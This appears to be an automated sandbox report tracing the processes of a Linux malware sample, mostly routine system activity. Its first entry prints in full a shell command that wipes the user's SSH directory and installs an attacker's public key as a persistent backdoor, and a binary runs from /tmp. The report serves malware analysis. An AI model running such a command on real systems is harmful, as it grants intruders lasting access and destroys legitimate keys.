Analysis Process: sh PID: 20759 Parent PID: 20758
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh
Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~" File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
File Activities
File Read
File Written
Analysis Process: sh PID: 20761 Parent PID: 20759
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: rm PID: 20761 Parent PID: 20759
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/rm Arguments: rm -rf .ssh File size: 60272 bytes MD5 hash: b79876063d894c449856cca508ecca7f
File Activities
File Deleted
File Read
Analysis Process: sh PID: 20764 Parent PID: 20759
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: mkdir PID: 20764 Parent PID: 20759
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/mkdir Arguments: mkdir .ssh File size: 76848 bytes MD5 hash: a97f666f21c85ec62ea47d022263ef41
File Activities
File Read
Directory Created
Analysis Process: sh PID: 20771 Parent PID: 20759
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: chmod PID: 20771 Parent PID: 20759
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/chmod Arguments: chmod -R go= /home/user/.ssh File size: 56112 bytes MD5 hash: 32c8c7318223ebc5b934a78cfc153d6f
File Activities
File Read
Directory Enumerated
Permission Modified
Analysis Process: anacron PID: 20780 Parent PID: 20758
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /tmp/anacron Arguments: n/a File size: 2902776 bytes MD5 hash: 8d5d71c56b1f807edac5ac734feab41a
File Activities
File Read
File Written
Analysis Process: upstart PID: 20811 Parent PID: 20139
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /sbin/upstart Arguments: n/a File size: 0 bytes MD5 hash: 00000000000000000000000000000000
Analysis Process: sh PID: 20811 Parent PID: 20139
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: /bin/sh -e /proc/self/fd/9 File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
File Activities
File Read
Analysis Process: sh PID: 20812 Parent PID: 20811
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: date PID: 20812 Parent PID: 20811
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/date Arguments: date File size: 68464 bytes MD5 hash: 54903b613f9019bfca9f5d28a4fff34e
File Activities
File Read
Analysis Process: sh PID: 20813 Parent PID: 20811
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: apport-checkreports PID: 20813 Parent PID: 20811
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /usr/share/apport/apport-checkreports Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system File size: 1269 bytes MD5 hash: 1a7d84ebc34df04e55ca3723541f48c9
File Activities
File Read
File Written
Directory Enumerated
Analysis Process: upstart PID: 20838 Parent PID: 20139
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /sbin/upstart Arguments: n/a File size: 0 bytes MD5 hash: 00000000000000000000000000000000
Analysis Process: sh PID: 20838 Parent PID: 20139
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: /bin/sh -e /proc/self/fd/9 File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
File Activities
File Read
Analysis Process: sh PID: 20839 Parent PID: 20838
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: date PID: 20839 Parent PID: 20838
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/date Arguments: date File size: 68464 bytes MD5 hash: 54903b613f9019bfca9f5d28a4fff34e
File Activities
File Read
Analysis Process: sh PID: 20855 Parent PID: 20838
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: apport-gtk PID: 20855 Parent PID: 20838
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /usr/share/apport/apport-gtk Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk File size: 23806 bytes MD5 hash: ec58a49a30ef6a29406a204f28cc7d87
File Activities
File Read
File Written
Directory Enumerated
Analysis Process: upstart PID: 20868 Parent PID: 20139
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /sbin/upstart Arguments: n/a File size: 0 bytes MD5 hash: 00000000000000000000000000000000
Analysis Process: sh PID: 20868 Parent PID: 20139
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: /bin/sh -e /proc/self/fd/9 File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
File Activities
File Read
Analysis Process: sh PID: 20869 Parent PID: 20868
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: date PID: 20869 Parent PID: 20868
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/date Arguments: date File size: 68464 bytes MD5 hash: 54903b613f9019bfca9f5d28a4fff34e
File Activities
File Read
Analysis Process: sh PID: 20870 Parent PID: 20868
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: apport-gtk PID: 20870 Parent PID: 20868
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /usr/share/apport/apport-gtk Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk File size: 23806 bytes MD5 hash: ec58a49a30ef6a29406a204f28cc7d87
File Activities
File Read
Directory Enumerated